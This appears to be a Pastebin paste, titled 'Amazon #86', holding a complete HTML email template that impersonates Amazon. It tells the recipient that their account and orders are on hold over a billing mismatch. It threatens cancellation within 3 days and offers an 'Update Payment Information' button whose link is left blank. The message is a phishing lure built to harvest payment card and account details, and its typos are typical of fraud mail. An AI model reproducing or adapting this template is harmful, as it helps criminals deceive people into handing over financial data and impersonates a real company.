Advertisement
CSOfficial

14 | Amazon #86

Oct 12th, 2022
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 28.85 KB | None | 0 0
  1. <!doctype html>
  2. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  3.     <head>
  4.         <!-- NAME: 1 COLUMN -->
  5.         <!--[if gte mso 15]>
  6.        <xml>
  7.            <o:OfficeDocumentSettings>
  8.            <o:AllowPNG/>
  9.            <o:PixelsPerInch>96</o:PixelsPerInch>
  10.            </o:OfficeDocumentSettings>
  11.        </xml>
  12.        <![endif]-->
  13.         <meta charset="UTF-8">
  14.         <meta http-equiv="X-UA-Compatible" content="IE=edge">
  15.         <meta name="viewport" content="width=device-width, initial-scale=1">
  16.         <title>*|MC:SUBJECT|*</title>
  17.        
  18.     <style type="text/css">
  19.         p{
  20.             margin:10px 0;
  21.             padding:0;
  22.         }
  23.         table{
  24.             border-collapse:collapse;
  25.         }
  26.         h1,h2,h3,h4,h5,h6{
  27.             display:block;
  28.             margin:0;
  29.             padding:0;
  30.         }
  31.         img,a img{
  32.             border:0;
  33.             height:auto;
  34.             outline:none;
  35.             text-decoration:none;
  36.         }
  37.         body,#bodyTable,#bodyCell{
  38.             height:100%;
  39.             margin:0;
  40.             padding:0;
  41.             width:100%;
  42.         }
  43.         .mcnPreviewText{
  44.             display:none !important;
  45.         }
  46.         #outlook a{
  47.             padding:0;
  48.         }
  49.         img{
  50.             -ms-interpolation-mode:bicubic;
  51.         }
  52.         table{
  53.             mso-table-lspace:0pt;
  54.             mso-table-rspace:0pt;
  55.         }
  56.         .ReadMsgBody{
  57.             width:100%;
  58.         }
  59.         .ExternalClass{
  60.             width:100%;
  61.         }
  62.         p,a,li,td,blockquote{
  63.             mso-line-height-rule:exactly;
  64.         }
  65.         a[href^=tel],a[href^=sms]{
  66.             color:inherit;
  67.             cursor:default;
  68.             text-decoration:none;
  69.         }
  70.         p,a,li,td,body,table,blockquote{
  71.             -ms-text-size-adjust:100%;
  72.             -webkit-text-size-adjust:100%;
  73.         }
  74.         .ExternalClass,.ExternalClass p,.ExternalClass td,.ExternalClass div,.ExternalClass span,.ExternalClass font{
  75.             line-height:100%;
  76.         }
  77.         a[x-apple-data-detectors]{
  78.             color:inherit !important;
  79.             text-decoration:none !important;
  80.             font-size:inherit !important;
  81.             font-family:inherit !important;
  82.             font-weight:inherit !important;
  83.             line-height:inherit !important;
  84.         }
  85.         #bodyCell{
  86.             padding:10px;
  87.         }
  88.         .templateContainer{
  89.             max-width:600px !important;
  90.         }
  91.         a.mcnButton{
  92.             display:block;
  93.         }
  94.         .mcnImage,.mcnRetinaImage{
  95.             vertical-align:bottom;
  96.         }
  97.         .mcnTextContent{
  98.             word-break:break-word;
  99.         }
  100.         .mcnTextContent img{
  101.             height:auto !important;
  102.         }
  103.         .mcnDividerBlock{
  104.             table-layout:fixed !important;
  105.         }
  106.     /*
  107.     @tab Page
  108.     @section Background Style
  109.     @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  110.     */
  111.         body,#bodyTable{
  112.             /*@editable*/background-color:#FAFAFA;
  113.         }
  114.     /*
  115.     @tab Page
  116.     @section Background Style
  117.     @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  118.     */
  119.         #bodyCell{
  120.             /*@editable*/border-top:0;
  121.         }
  122.     /*
  123.     @tab Page
  124.     @section Email Border
  125.     @tip Set the border for your email.
  126.     */
  127.         .templateContainer{
  128.             /*@editable*/border:0;
  129.         }
  130.     /*
  131.     @tab Page
  132.     @section Heading 1
  133.     @tip Set the styling for all first-level headings in your emails. These should be the largest of your headings.
  134.     @style heading 1
  135.     */
  136.         h1{
  137.             /*@editable*/color:#202020;
  138.             /*@editable*/font-family:Helvetica;
  139.             /*@editable*/font-size:26px;
  140.             /*@editable*/font-style:normal;
  141.             /*@editable*/font-weight:bold;
  142.             /*@editable*/line-height:125%;
  143.             /*@editable*/letter-spacing:normal;
  144.             /*@editable*/text-align:left;
  145.         }
  146.     /*
  147.     @tab Page
  148.     @section Heading 2
  149.     @tip Set the styling for all second-level headings in your emails.
  150.     @style heading 2
  151.     */
  152.         h2{
  153.             /*@editable*/color:#202020;
  154.             /*@editable*/font-family:Helvetica;
  155.             /*@editable*/font-size:22px;
  156.             /*@editable*/font-style:normal;
  157.             /*@editable*/font-weight:bold;
  158.             /*@editable*/line-height:125%;
  159.             /*@editable*/letter-spacing:normal;
  160.             /*@editable*/text-align:left;
  161.         }
  162.     /*
  163.     @tab Page
  164.     @section Heading 3
  165.     @tip Set the styling for all third-level headings in your emails.
  166.     @style heading 3
  167.     */
  168.         h3{
  169.             /*@editable*/color:#202020;
  170.             /*@editable*/font-family:Helvetica;
  171.             /*@editable*/font-size:20px;
  172.             /*@editable*/font-style:normal;
  173.             /*@editable*/font-weight:bold;
  174.             /*@editable*/line-height:125%;
  175.             /*@editable*/letter-spacing:normal;
  176.             /*@editable*/text-align:left;
  177.         }
  178.     /*
  179.     @tab Page
  180.     @section Heading 4
  181.     @tip Set the styling for all fourth-level headings in your emails. These should be the smallest of your headings.
  182.     @style heading 4
  183.     */
  184.         h4{
  185.             /*@editable*/color:#202020;
  186.             /*@editable*/font-family:Helvetica;
  187.             /*@editable*/font-size:18px;
  188.             /*@editable*/font-style:normal;
  189.             /*@editable*/font-weight:bold;
  190.             /*@editable*/line-height:125%;
  191.             /*@editable*/letter-spacing:normal;
  192.             /*@editable*/text-align:left;
  193.         }
  194.     /*
  195.     @tab Preheader
  196.     @section Preheader Style
  197.     @tip Set the background color and borders for your email's preheader area.
  198.     */
  199.         #templatePreheader{
  200.             /*@editable*/background-color:#FAFAFA;
  201.             /*@editable*/background-image:none;
  202.             /*@editable*/background-repeat:no-repeat;
  203.             /*@editable*/background-position:center;
  204.             /*@editable*/background-size:cover;
  205.             /*@editable*/border-top:0;
  206.             /*@editable*/border-bottom:0;
  207.             /*@editable*/padding-top:9px;
  208.             /*@editable*/padding-bottom:9px;
  209.         }
  210.     /*
  211.     @tab Preheader
  212.     @section Preheader Text
  213.     @tip Set the styling for your email's preheader text. Choose a size and color that is easy to read.
  214.     */
  215.         #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  216.             /*@editable*/color:#656565;
  217.             /*@editable*/font-family:Helvetica;
  218.             /*@editable*/font-size:12px;
  219.             /*@editable*/line-height:150%;
  220.             /*@editable*/text-align:left;
  221.         }
  222.     /*
  223.     @tab Preheader
  224.     @section Preheader Link
  225.     @tip Set the styling for your email's preheader links. Choose a color that helps them stand out from your text.
  226.     */
  227.         #templatePreheader .mcnTextContent a,#templatePreheader .mcnTextContent p a{
  228.             /*@editable*/color:#656565;
  229.             /*@editable*/font-weight:normal;
  230.             /*@editable*/text-decoration:underline;
  231.         }
  232.     /*
  233.     @tab Header
  234.     @section Header Style
  235.     @tip Set the background color and borders for your email's header area.
  236.     */
  237.         #templateHeader{
  238.             /*@editable*/background-color:#FFFFFF;
  239.             /*@editable*/background-image:none;
  240.             /*@editable*/background-repeat:no-repeat;
  241.             /*@editable*/background-position:center;
  242.             /*@editable*/background-size:cover;
  243.             /*@editable*/border-top:0;
  244.             /*@editable*/border-bottom:0;
  245.             /*@editable*/padding-top:9px;
  246.             /*@editable*/padding-bottom:0;
  247.         }
  248.     /*
  249.     @tab Header
  250.     @section Header Text
  251.     @tip Set the styling for your email's header text. Choose a size and color that is easy to read.
  252.     */
  253.         #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  254.             /*@editable*/color:#202020;
  255.             /*@editable*/font-family:Helvetica;
  256.             /*@editable*/font-size:16px;
  257.             /*@editable*/line-height:150%;
  258.             /*@editable*/text-align:left;
  259.         }
  260.     /*
  261.     @tab Header
  262.     @section Header Link
  263.     @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  264.     */
  265.         #templateHeader .mcnTextContent a,#templateHeader .mcnTextContent p a{
  266.             /*@editable*/color:#007C89;
  267.             /*@editable*/font-weight:normal;
  268.             /*@editable*/text-decoration:underline;
  269.         }
  270.     /*
  271.     @tab Body
  272.     @section Body Style
  273.     @tip Set the background color and borders for your email's body area.
  274.     */
  275.         #templateBody{
  276.             /*@editable*/background-color:#FFFFFF;
  277.             /*@editable*/background-image:none;
  278.             /*@editable*/background-repeat:no-repeat;
  279.             /*@editable*/background-position:center;
  280.             /*@editable*/background-size:cover;
  281.             /*@editable*/border-top:0;
  282.             /*@editable*/border-bottom:2px solid #EAEAEA;
  283.             /*@editable*/padding-top:0;
  284.             /*@editable*/padding-bottom:9px;
  285.         }
  286.     /*
  287.     @tab Body
  288.     @section Body Text
  289.     @tip Set the styling for your email's body text. Choose a size and color that is easy to read.
  290.     */
  291.         #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  292.             /*@editable*/color:#202020;
  293.             /*@editable*/font-family:Helvetica;
  294.             /*@editable*/font-size:16px;
  295.             /*@editable*/line-height:150%;
  296.             /*@editable*/text-align:left;
  297.         }
  298.     /*
  299.     @tab Body
  300.     @section Body Link
  301.     @tip Set the styling for your email's body links. Choose a color that helps them stand out from your text.
  302.     */
  303.         #templateBody .mcnTextContent a,#templateBody .mcnTextContent p a{
  304.             /*@editable*/color:#007C89;
  305.             /*@editable*/font-weight:normal;
  306.             /*@editable*/text-decoration:underline;
  307.         }
  308.     /*
  309.     @tab Footer
  310.     @section Footer Style
  311.     @tip Set the background color and borders for your email's footer area.
  312.     */
  313.         #templateFooter{
  314.             /*@editable*/background-color:#FAFAFA;
  315.             /*@editable*/background-image:none;
  316.             /*@editable*/background-repeat:no-repeat;
  317.             /*@editable*/background-position:center;
  318.             /*@editable*/background-size:cover;
  319.             /*@editable*/border-top:0;
  320.             /*@editable*/border-bottom:0;
  321.             /*@editable*/padding-top:9px;
  322.             /*@editable*/padding-bottom:9px;
  323.         }
  324.     /*
  325.     @tab Footer
  326.     @section Footer Text
  327.     @tip Set the styling for your email's footer text. Choose a size and color that is easy to read.
  328.     */
  329.         #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  330.             /*@editable*/color:#656565;
  331.             /*@editable*/font-family:Helvetica;
  332.             /*@editable*/font-size:12px;
  333.             /*@editable*/line-height:150%;
  334.             /*@editable*/text-align:center;
  335.         }
  336.     /*
  337.     @tab Footer
  338.     @section Footer Link
  339.     @tip Set the styling for your email's footer links. Choose a color that helps them stand out from your text.
  340.     */
  341.         #templateFooter .mcnTextContent a,#templateFooter .mcnTextContent p a{
  342.             /*@editable*/color:#656565;
  343.             /*@editable*/font-weight:normal;
  344.             /*@editable*/text-decoration:underline;
  345.         }
  346.     @media only screen and (min-width:768px){
  347.         .templateContainer{
  348.             width:600px !important;
  349.         }
  350.  
  351. }   @media only screen and (max-width: 480px){
  352.         body,table,td,p,a,li,blockquote{
  353.             -webkit-text-size-adjust:none !important;
  354.         }
  355.  
  356. }   @media only screen and (max-width: 480px){
  357.         body{
  358.             width:100% !important;
  359.             min-width:100% !important;
  360.         }
  361.  
  362. }   @media only screen and (max-width: 480px){
  363.         .mcnRetinaImage{
  364.             max-width:100% !important;
  365.         }
  366.  
  367. }   @media only screen and (max-width: 480px){
  368.         .mcnImage{
  369.             width:100% !important;
  370.         }
  371.  
  372. }   @media only screen and (max-width: 480px){
  373.         .mcnCartContainer,.mcnCaptionTopContent,.mcnRecContentContainer,.mcnCaptionBottomContent,.mcnTextContentContainer,.mcnBoxedTextContentContainer,.mcnImageGroupContentContainer,.mcnCaptionLeftTextContentContainer,.mcnCaptionRightTextContentContainer,.mcnCaptionLeftImageContentContainer,.mcnCaptionRightImageContentContainer,.mcnImageCardLeftTextContentContainer,.mcnImageCardRightTextContentContainer,.mcnImageCardLeftImageContentContainer,.mcnImageCardRightImageContentContainer{
  374.             max-width:100% !important;
  375.             width:100% !important;
  376.         }
  377.  
  378. }   @media only screen and (max-width: 480px){
  379.         .mcnBoxedTextContentContainer{
  380.             min-width:100% !important;
  381.         }
  382.  
  383. }   @media only screen and (max-width: 480px){
  384.         .mcnImageGroupContent{
  385.             padding:9px !important;
  386.         }
  387.  
  388. }   @media only screen and (max-width: 480px){
  389.         .mcnCaptionLeftContentOuter .mcnTextContent,.mcnCaptionRightContentOuter .mcnTextContent{
  390.             padding-top:9px !important;
  391.         }
  392.  
  393. }   @media only screen and (max-width: 480px){
  394.         .mcnImageCardTopImageContent,.mcnCaptionBottomContent:last-child .mcnCaptionBottomImageContent,.mcnCaptionBlockInner .mcnCaptionTopContent:last-child .mcnTextContent{
  395.             padding-top:18px !important;
  396.         }
  397.  
  398. }   @media only screen and (max-width: 480px){
  399.         .mcnImageCardBottomImageContent{
  400.             padding-bottom:9px !important;
  401.         }
  402.  
  403. }   @media only screen and (max-width: 480px){
  404.         .mcnImageGroupBlockInner{
  405.             padding-top:0 !important;
  406.             padding-bottom:0 !important;
  407.         }
  408.  
  409. }   @media only screen and (max-width: 480px){
  410.         .mcnImageGroupBlockOuter{
  411.             padding-top:9px !important;
  412.             padding-bottom:9px !important;
  413.         }
  414.  
  415. }   @media only screen and (max-width: 480px){
  416.         .mcnTextContent,.mcnBoxedTextContentColumn{
  417.             padding-right:18px !important;
  418.             padding-left:18px !important;
  419.         }
  420.  
  421. }   @media only screen and (max-width: 480px){
  422.         .mcnImageCardLeftImageContent,.mcnImageCardRightImageContent{
  423.             padding-right:18px !important;
  424.             padding-bottom:0 !important;
  425.             padding-left:18px !important;
  426.         }
  427.  
  428. }   @media only screen and (max-width: 480px){
  429.         .mcpreview-image-uploader{
  430.             display:none !important;
  431.             width:100% !important;
  432.         }
  433.  
  434. }   @media only screen and (max-width: 480px){
  435.     /*
  436.     @tab Mobile Styles
  437.     @section Heading 1
  438.     @tip Make the first-level headings larger in size for better readability on small screens.
  439.     */
  440.         h1{
  441.             /*@editable*/font-size:22px !important;
  442.             /*@editable*/line-height:125% !important;
  443.         }
  444.  
  445. }   @media only screen and (max-width: 480px){
  446.     /*
  447.     @tab Mobile Styles
  448.     @section Heading 2
  449.     @tip Make the second-level headings larger in size for better readability on small screens.
  450.     */
  451.         h2{
  452.             /*@editable*/font-size:20px !important;
  453.             /*@editable*/line-height:125% !important;
  454.         }
  455.  
  456. }   @media only screen and (max-width: 480px){
  457.     /*
  458.     @tab Mobile Styles
  459.     @section Heading 3
  460.     @tip Make the third-level headings larger in size for better readability on small screens.
  461.     */
  462.         h3{
  463.             /*@editable*/font-size:18px !important;
  464.             /*@editable*/line-height:125% !important;
  465.         }
  466.  
  467. }   @media only screen and (max-width: 480px){
  468.     /*
  469.     @tab Mobile Styles
  470.     @section Heading 4
  471.     @tip Make the fourth-level headings larger in size for better readability on small screens.
  472.     */
  473.         h4{
  474.             /*@editable*/font-size:16px !important;
  475.             /*@editable*/line-height:150% !important;
  476.         }
  477.  
  478. }   @media only screen and (max-width: 480px){
  479.     /*
  480.     @tab Mobile Styles
  481.     @section Boxed Text
  482.     @tip Make the boxed text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  483.     */
  484.         .mcnBoxedTextContentContainer .mcnTextContent,.mcnBoxedTextContentContainer .mcnTextContent p{
  485.             /*@editable*/font-size:14px !important;
  486.             /*@editable*/line-height:150% !important;
  487.         }
  488.  
  489. }   @media only screen and (max-width: 480px){
  490.     /*
  491.     @tab Mobile Styles
  492.     @section Preheader Visibility
  493.     @tip Set the visibility of the email's preheader on small screens. You can hide it to save space.
  494.     */
  495.         #templatePreheader{
  496.             /*@editable*/display:block !important;
  497.         }
  498.  
  499. }   @media only screen and (max-width: 480px){
  500.     /*
  501.     @tab Mobile Styles
  502.     @section Preheader Text
  503.     @tip Make the preheader text larger in size for better readability on small screens.
  504.     */
  505.         #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  506.             /*@editable*/font-size:14px !important;
  507.             /*@editable*/line-height:150% !important;
  508.         }
  509.  
  510. }   @media only screen and (max-width: 480px){
  511.     /*
  512.     @tab Mobile Styles
  513.     @section Header Text
  514.     @tip Make the header text larger in size for better readability on small screens.
  515.     */
  516.         #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  517.             /*@editable*/font-size:16px !important;
  518.             /*@editable*/line-height:150% !important;
  519.         }
  520.  
  521. }   @media only screen and (max-width: 480px){
  522.     /*
  523.     @tab Mobile Styles
  524.     @section Body Text
  525.     @tip Make the body text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  526.     */
  527.         #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  528.             /*@editable*/font-size:16px !important;
  529.             /*@editable*/line-height:150% !important;
  530.         }
  531.  
  532. }   @media only screen and (max-width: 480px){
  533.     /*
  534.     @tab Mobile Styles
  535.     @section Footer Text
  536.     @tip Make the footer content text larger in size for better readability on small screens.
  537.     */
  538.         #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  539.             /*@editable*/font-size:14px !important;
  540.             /*@editable*/line-height:150% !important;
  541.         }
  542.  
  543. }</style></head>
  544.     <body>
  545.         <!--*|IF:MC_PREVIEW_TEXT|*-->
  546.         <!--[if !gte mso 9]><!----><span class="mcnPreviewText" style="display:none; font-size:0px; line-height:0px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; visibility:hidden; mso-hide:all;">*|MC_PREVIEW_TEXT|*</span><!--<![endif]-->
  547.         <!--*|END:IF|*-->
  548.         <center>
  549.             <table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable">
  550.                 <tr>
  551.                     <td align="center" valign="top" id="bodyCell">
  552.                         <!-- BEGIN TEMPLATE // -->
  553.                         <!--[if (gte mso 9)|(IE)]>
  554.                        <table align="center" border="0" cellspacing="0" cellpadding="0" width="600" style="width:600px;">
  555.                        <tr>
  556.                        <td align="center" valign="top" width="600" style="width:600px;">
  557.                        <![endif]-->
  558.                         <table border="0" cellpadding="0" cellspacing="0" width="100%" class="templateContainer">
  559.                             <tr>
  560.                                 <td valign="top" id="templatePreheader"></td>
  561.                             </tr>
  562.                             <tr>
  563.                                 <td valign="top" id="templateHeader"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnCaptionBlock">
  564.     <tbody class="mcnCaptionBlockOuter">
  565.         <tr>
  566.             <td class="mcnCaptionBlockInner" valign="top" style="padding:9px;">
  567.                
  568.  
  569.  
  570.  
  571. <table border="0" cellpadding="0" cellspacing="0" class="mcnCaptionRightContentOuter" width="100%">
  572.     <tbody><tr>
  573.         <td valign="top" class="mcnCaptionRightContentInner" style="padding:0 9px ;">
  574.             <table align="left" border="0" cellpadding="0" cellspacing="0" class="mcnCaptionRightImageContentContainer" width="264">
  575.                 <tbody><tr>
  576.                     <td class="mcnCaptionRightImageContent" align="center" valign="top">
  577.                    
  578.                        
  579.  
  580.                         <img alt="" src="https://mcusercontent.com/551c329a3ccc109a9265eb90b/images/82338051-ee7c-e866-9535-a65f39412394.png" width="264" style="max-width:347px;" class="mcnImage">
  581.                        
  582.  
  583.                    
  584.                     </td>
  585.                 </tr>
  586.             </tbody></table>
  587.             <table class="mcnCaptionRightTextContentContainer" align="right" border="0" cellpadding="0" cellspacing="0" width="264">
  588.                 <tbody><tr>
  589.                     <td valign="top" class="mcnTextContent">
  590.                         &nbsp;
  591. <table align="right" cellpadding="0" cellspacing="0">
  592.     <tbody>
  593.         <tr>
  594.             <td align="left">
  595.             <table cellpadding="0" cellspacing="0" role="presentation" width="100%">
  596.                 <tbody>
  597.                     <tr>
  598.                         <td align="left">
  599.                         <p><span style="font-size:18px"><strong>Payment Temporary Disabled</strong></span></p>
  600.                         </td>
  601.                     </tr>
  602.                 </tbody>
  603.             </table>
  604.             </td>
  605.         </tr>
  606.     </tbody>
  607. </table>
  608.  
  609.                     </td>
  610.                 </tr>
  611.             </tbody></table>
  612.         </td>
  613.     </tr>
  614. </tbody></table>
  615.  
  616.  
  617.  
  618.  
  619.             </td>
  620.         </tr>
  621.     </tbody>
  622. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
  623.     <tbody class="mcnDividerBlockOuter">
  624.         <tr>
  625.             <td class="mcnDividerBlockInner" style="min-width:100%; padding:18px;">
  626.                 <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top: 3px outset #0F0E0E;">
  627.                     <tbody><tr>
  628.                         <td>
  629.                             <span></span>
  630.                         </td>
  631.                     </tr>
  632.                 </tbody></table>
  633. <!--            
  634.                <td class="mcnDividerBlockInner" style="padding: 18px;">
  635.                <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
  636. -->
  637.             </td>
  638.         </tr>
  639.     </tbody>
  640. </table></td>
  641.                             </tr>
  642.                             <tr>
  643.                                 <td valign="top" id="templateBody"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  644.     <tbody class="mcnTextBlockOuter">
  645.         <tr>
  646.             <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  647.                 <!--[if mso]>
  648.                 <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  649.                 <tr>
  650.                 <![endif]-->
  651.                
  652.                 <!--[if mso]>
  653.                 <td valign="top" width="600" style="width:600px;">
  654.                 <![endif]-->
  655.                 <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  656.                     <tbody><tr>
  657.                        
  658.                         <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
  659.                        
  660.                             <strong><span style="color:#DAA520">Hello</span>,</strong><br>
  661. We have placed a hold on your Amazon account and all pending orders.<br>
  662. <br>
  663. <strong>We took this action billing information you provided did not match the information on file with the card issuer.</strong><br>
  664. <br>
  665. To fix this problem, please check the name, address and phone number registered on your payment card. if you recently moved, you may need yo update this information with the card issuer.&nbsp;
  666.                         </td>
  667.                     </tr>
  668.                 </tbody></table>
  669.                 <!--[if mso]>
  670.                 </td>
  671.                 <![endif]-->
  672.                
  673.                 <!--[if mso]>
  674.                 </tr>
  675.                 </table>
  676.                 <![endif]-->
  677.             </td>
  678.         </tr>
  679.     </tbody>
  680. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
  681.     <tbody class="mcnDividerBlockOuter">
  682.         <tr>
  683.             <td class="mcnDividerBlockInner" style="min-width:100%; padding:18px;">
  684.                 <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top: 1px solid #222222;">
  685.                     <tbody><tr>
  686.                         <td>
  687.                             <span></span>
  688.                         </td>
  689.                     </tr>
  690.                 </tbody></table>
  691. <!--            
  692.                <td class="mcnDividerBlockInner" style="padding: 18px;">
  693.                <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
  694. -->
  695.             </td>
  696.         </tr>
  697.     </tbody>
  698. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  699.     <tbody class="mcnTextBlockOuter">
  700.         <tr>
  701.             <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  702.                 <!--[if mso]>
  703.                 <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  704.                 <tr>
  705.                 <![endif]-->
  706.                
  707.                 <!--[if mso]>
  708.                 <td valign="top" width="600" style="width:600px;">
  709.                 <![endif]-->
  710.                 <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  711.                     <tbody><tr>
  712.                        
  713.                         <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
  714.                        
  715.                             <table cellpadding="0" cellspacing="0" width="100%">
  716.     <tbody>
  717.         <tr>
  718.             <td align="center" valign="top">
  719.             <table cellpadding="0" cellspacing="0" role="presentation" width="100%">
  720.                 <tbody>
  721.                     <tr>
  722.                         <td align="left">
  723.                         <p><strong>Please visit to update the payment infomation for your order.</strong></p>
  724.                         </td>
  725.                     </tr>
  726.                 </tbody>
  727.             </table>
  728.             </td>
  729.         </tr>
  730.     </tbody>
  731. </table>
  732.  
  733.                         </td>
  734.                     </tr>
  735.                 </tbody></table>
  736.                 <!--[if mso]>
  737.                 </td>
  738.                 <![endif]-->
  739.                
  740.                 <!--[if mso]>
  741.                 </tr>
  742.                 </table>
  743.                 <![endif]-->
  744.             </td>
  745.         </tr>
  746.     </tbody>
  747. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnButtonBlock" style="min-width:100%;">
  748.     <tbody class="mcnButtonBlockOuter">
  749.         <tr>
  750.             <td style="padding-top:0; padding-right:18px; padding-bottom:18px; padding-left:18px;" valign="top" align="center" class="mcnButtonBlockInner">
  751.                 <table border="0" cellpadding="0" cellspacing="0" class="mcnButtonContentContainer" style="border-collapse: separate !important;border-radius: 50px;background-color: #E8B201;">
  752.                     <tbody>
  753.                         <tr>
  754.                             <td align="center" valign="middle" class="mcnButtonContent" style="font-family: Arial; font-size: 16px; padding: 18px;">
  755.                                 <a class="mcnButton " title="Update Payment Information" href="" target="_blank" style="font-weight: bold;letter-spacing: normal;line-height: 100%;text-align: center;text-decoration: none;color: #222222;">Update Payment Information</a>
  756.                             </td>
  757.                         </tr>
  758.                     </tbody>
  759.                 </table>
  760.             </td>
  761.         </tr>
  762.     </tbody>
  763. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  764.     <tbody class="mcnTextBlockOuter">
  765.         <tr>
  766.             <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  767.                 <!--[if mso]>
  768.                 <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  769.                 <tr>
  770.                 <![endif]-->
  771.                
  772.                 <!--[if mso]>
  773.                 <td valign="top" width="600" style="width:600px;">
  774.                 <![endif]-->
  775.                 <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  776.                     <tbody><tr>
  777.                        
  778.                         <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
  779.                        
  780.                             <table cellpadding="0" cellspacing="0" width="100%">
  781.     <tbody>
  782.         <tr>
  783.             <td align="center" valign="top">
  784.             <table cellpadding="0" cellspacing="0" role="presentation" width="100%">
  785.                 <tbody>
  786.                     <tr>
  787.                         <td align="left">
  788.                         <p>If we are unbale to complete the verification process within 3 days, all pending orders will be canceled. You won't be able to access your account until this process is complete. We ask you not to open a new account as a new order may be delayed.<br>
  789.                         <br>
  790.                         We appreciate your patience with our security measures,<br>
  791.                         Thank you for tour concem.<br>
  792.                         <br>
  793.                         Sincerely,<br>
  794.                         <br>
  795.                         <strong>Amazon.com</strong></p>
  796.                         </td>
  797.                     </tr>
  798.                 </tbody>
  799.             </table>
  800.             </td>
  801.         </tr>
  802.     </tbody>
  803. </table>
  804.  
  805.                         </td>
  806.                     </tr>
  807.                 </tbody></table>
  808.                 <!--[if mso]>
  809.                 </td>
  810.                 <![endif]-->
  811.                
  812.                 <!--[if mso]>
  813.                 </tr>
  814.                 </table>
  815.                 <![endif]-->
  816.             </td>
  817.         </tr>
  818.     </tbody>
  819. </table></td>
  820.                             </tr>
  821.                             <tr>
  822.                                 <td valign="top" id="templateFooter"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
  823.     <tbody class="mcnDividerBlockOuter">
  824.         <tr>
  825.             <td class="mcnDividerBlockInner" style="min-width: 100%; padding: 10px 18px 25px;">
  826.                 <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top: 2px solid #EEEEEE;">
  827.                     <tbody><tr>
  828.                         <td>
  829.                             <span></span>
  830.                         </td>
  831.                     </tr>
  832.                 </tbody></table>
  833. <!--            
  834.                <td class="mcnDividerBlockInner" style="padding: 18px;">
  835.                <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
  836. -->
  837.             </td>
  838.         </tr>
  839.     </tbody>
  840. </table></td>
  841.                             </tr>
  842.                         </table>
  843.                         <!--[if (gte mso 9)|(IE)]>
  844.                        </td>
  845.                        </tr>
  846.                        </table>
  847.                        <![endif]-->
  848.                         <!-- // END TEMPLATE -->
  849.                     </td>
  850.                 </tr>
  851.             </table>
  852.         </center>
  853.     <script type="text/javascript"  src="/Cr6OV0jDq7vATtNL9w/tYuYwfk8XOru/X1wmHWwPBQ/VE/I2ClpOLwEC"></script></body>
  854. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement